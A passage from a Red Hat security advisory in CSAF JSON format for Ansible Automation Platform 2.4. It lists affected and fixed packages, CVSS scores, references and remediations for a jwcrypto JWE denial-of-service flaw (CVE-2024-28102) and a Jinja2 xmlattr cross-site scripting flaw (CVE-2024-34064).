"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-28102"
},
{
"category": "external",
"summary": "RHBZ#2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-28102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28102"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
}
],
"release_date": "2024-03-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-07-12T01:43:40+00:00",
"details": "Red Hat Ansible Automation Platform",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-jwcrypto: malicious JWE token can cause denial of service"
},
{
"cve": "CVE-2024-34064",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-05-07T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2279476"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in jinja2. The `xmlattr` filter accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, `/`, `\u003e`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could inject other attributes and perform cross-site scripting (XSS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jinja2: accepts keys containing non-attribute characters",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The fix for CVE-2024-22195 only addressed spaces, not other characters. Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting _values_ as user input continues to be safe.\n\nFence agents on RHEL 8 has been fixed as a part of https://access.redhat.com/errata/RHBA-2024:4238",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34064"
},
{
"category": "external",
"summary": "RHBZ#2279476",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279476"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34064",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34064"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"
},
{
"category": "external",
"summary": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj",
"url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"
}
],
"release_date": "2024-05-06T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-07-12T01:43:40+00:00",
"details": "Red Hat Ansible Automation Platform",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
},
{
"category": "workaround",
"details": "Do not accept user input as keys to the xmlattr filter without validation. See the statement above for more information.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
